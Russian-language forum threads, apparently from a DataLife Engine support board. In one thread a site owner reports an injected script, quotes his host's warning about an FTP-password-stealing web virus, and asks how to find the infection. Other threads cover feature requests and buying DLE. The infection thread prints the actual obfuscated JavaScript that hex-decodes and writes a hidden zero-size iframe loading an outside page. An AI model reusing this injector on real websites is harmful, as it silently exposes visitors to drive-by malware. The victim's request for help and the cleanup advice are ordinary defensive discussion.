[Скрипт появился...]

Вот что хостер мне написал:

Здравствуйте!

В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct

(возможны другия названия), распространяющий себя через веб-сайты.

Схема заражения довольно проста: достаточно зайти на зараженный сайт и

при стандартных настройках безопасности браузера, вирус автоматически

установится на компьютере пользователя. После этого он начинает

отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав

определенное количество паролей, запускается специальная программа,

которая подключается по FTP к каждому сайту и встраивает в начало или

конец страниц собственный html-код.

Обращаем внимание, что в интернете можно встретить обсуждение данной

проблемы, где в качестве причин заражения указываются различные

бесплатные "движки" (phpBB и т.д.), либо наличие уязвимостей у

хостинг-провайдеров. Со своей стороны можем заверить, что вирус

распространяется только способом, описанным в этом письме, и его

появление не связано с проблемами безопасности на сервере.

В случае обнаружения следов вируса необходимо выполнить следующие

действия с обязательным соблюдением порядка:

1. Проверить нет ли чужих скриптов на ftp

2. Удалить все лишние коды iframe и javascript со страниц

3. Сменить ftp-клиент и браузер. Поставить новые версии, скаченные с

сайтов-производителей.

4. Поставить фаервол

5. Сменить все пароли

6. Не сохранять пароли в программах на комьютере. Вводить каждый раз.

Какой пароль для входа Вы используете?

[Скрипт появился...]

Langly,

файл index.php проверьте

Не могу попасть на сервер...

[Скрипт появился...]

Насчет где - большая вероятность, что index.php или engine.php. Сторонние модули ставил? Есть реклама на сайте?

Реклама-то есть. Но она есть давно, а эта хрень сегодня с утра появилась.

Началось с того, что касперыч заверещал, когда я сайт открывал:

обнаружено: троянская программа Trojan-Downloader.JS.Agent.iz Скрипт: http://endem.ru/[1]

обнаружено: троянская программа Trojan-Downloader.JS.Psyme.mf Скрипт: http://endem.ru/[3]

После, ни одного визга от него не было и сейчас нет. Заткнулся и молчит.

А скрипт этот висит в самом верху страницы, при просмотре HTML его видно... Шаблон открываю - там нет.

Проверка сайта, его антивирусом из админки, ничего не дает...

[Скрипт появился...]

1. троян на твоем компе - украдены пароли от фтп - залито по фтп
   
2. взломан комп хостера - украдены пароли от фтп- залито по фтп
   
3. троян на твоем компе - узнаны пароли от админки - добавлена запись в шаблоны
   
4. дал кому то пароли от админки - добавлена запись в шаблоны
   
5. не установил баг-фиксы - взломана админка - добавлена запись в шаблоны
   

А почему антивирус пишет "подозрительных объектов не обнаружено"?

Куды бечь? Что делать -то? Если я его найду в шаблонах и удалю, это решит проблему? Как быть уверенным в том, что ничего нигде не осталось?

И как искать? Может он разбросан кусками по разным местам...

P.S.Я его найти не могу... где, и самое главное, как искать?Подскажите пожалуйста.

[Скрипт появился...]

Если ты сам этого не добавлял, то меняй пароли на фтп, обращайся к хостеру. Это вирус скорее всего.

Откуда он мог появиться?

То есть возможные пути проникновения.

[Скрипт появился...]

Заметил вверху страницы, при просмотре HTML кода, вот это... Подскажите пожалуйста, что это???

<script type="text/javascript">function ahpgxusvlwuzz(skusjits){var fgdxbotv="";for(uknzaxauyi=0;uknzaxauyi

<skusjits.length;uknzaxauyi+=2){fgdxbotv+=(String.fromCharCode(parseInt(skusjits.substr(uknzaxauyi,2),16)));}document.write(fgdxbotv);}

ahpgxusvlwuzz"3C696672616D65207372633D22687474703A2F2F746F703130302D636F756E7465722E636F6D

2F746F703130302F696E6465782E70687022206672616D65626F726465723D22302220626F726465

723D2230222077696474683D22302

2206865696768743D223022207374796C653D22706F736974696F6E3A206162736F6C7574653B207

669736962696C6974793A2068696464656E3B

20646973706C61793A206E6F6E65223E3C2F696672616D653E");</script>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

[Пожелания для новых версий DataLife Engine]

Пожелания хоть и не касаются работы скрипта, но все-же есть:

Хотелось бы в "Управлении рекламой" иметь возможность "складировать" длинные вертикальные информеры не друг за другом как сейчас(портянка получается... реально метрами мерять можно!), а столбиками рядом.

При добавлении новости, в админпанели иметь по умолчанию "галку" и подпись к ней "выводить в рсс". Если новость не нужна в рсс, то галка снимается.

При загрузке изображений было бы удобно иметь у окошка с кнопкой "Обзор" кнопку "Еще". При нажатии выводилось бы еще одно подобное окошечко и так до 5-10. Чтобы разом можно было загрузить несколько картинок, а не по одной.

В админпанели в добавлении новостей не помешала бы кнопка "добавить таблицу" как в экселе. Раскладушка с клеточками(выбор кол-ва строк и столбцов)

[Покупка DLE]

Сelsoft, доброго времени суток!

Я оплатил 40+10

Сейчас в личку сброшу Вам необходимые сведения.

С ув., Langly

[Покупка DLE]

Хорошо, спасибо.

Тогда я жду, как только - так сразу отправлю Вам необходимые сведения.

[Покупка DLE]

4. Как будет происходить техподдержка, если я второй день не могу до вас достучаться?

Вам было отправлено два письма, но они вернулись с пометкой о том что не могут быть доставлены.

Если вы не получаете ответа в течении дня, то всегда пишите или в ПМ или на форуме, вы не полуете ответа не потому что вам не отвечают, а потому что бывает что e-mail не доходит до адресата.

Я ждал ответа в личку. ОК, приму к сведению.

На gmail вроде все послания доходят... хотя, вроде первоначально я дал другой ящик... ладно бог с ним.

Скажите, celsoft, я сейчас зарегистрировал домен. Он еще не ожил. В такой ситуации установить и настроить сайт можно, или надо дождаться когда он(домен) заработает? Если"Да-можно", то я сейчас оплачу 40+10 и можно приступать?

Расскажите пож. порядок моих и Ваших действий для покупки, установки и запуска сайта.

[Покупка DLE]

Langly,

дело Ваше.

Будут вопросы, спрашивайте.

ОК.

Спасибо.

[Покупка DLE]

Я сейчас оплатил домен и хостинг, пока все это устаканится... пишут 6-12 часов. Так-что скорее завтра.

[Покупка DLE]

Да, спасибо... смотрю, что дела с шаблонами надо оставить "на потом".

Подскажите, пож. если я сейчас оплачу по схеме 40+10, когда можно приступить к установке и настройке?

И уже потом, по-возможности, поменять шаблон.

Это будет трудно сделать? учитывая наличие контента на сайте?

Вообще, я смогу поменять шаблон? Это трудно?

[Покупка DLE]

То есть надо новый шаблон искать...

Плохо. Хотел купить прям сейчас... но нужен трехколоночный.

Шаблон стоит 60 баксов... легче действительно найти готовый движок с тремя колонками, жаль...

А почему не сделать по-умолчанию трехколоночный? Именно на них спрос. Даже на www.dletemplates.com, их нет. Все нарасхват. Одни двухколоночные валяются...

Может подскажите где купить готовый?

Блин, хотел чтобы все в одном месте было... и дле, и техподдержка...

[Покупка DLE]

Как же мне его сделать трехколоночным?

[Покупка DLE]

Писал ч/з форму обратной связи вчера-сегодня, но так и не получил ответа...

Хочу купить скрипт + техподдержка(40+10евро). Но у меня есть несколько вопросов.

1. Мне нужен трехколоночный сайт. Это настраивается? Вы писали, что в техподдержку входит установка сайта на сервер и отладка. Сделать его тремя колонками во время этих процедур возможно?

2. Сроки установки и отладки сайта на сервере?

3. В комплекте идут две стандартные шкуры(как в версии демо)? Или голый скрипт к которому надо дополнительно искать шаблон? Вообще после уплаты 50евро я получу рабочий и готовый сайт?

4. Как будет происходить техподдержка, если я второй день не могу до вас достучаться?

Спасибо.

С уважением,Langly.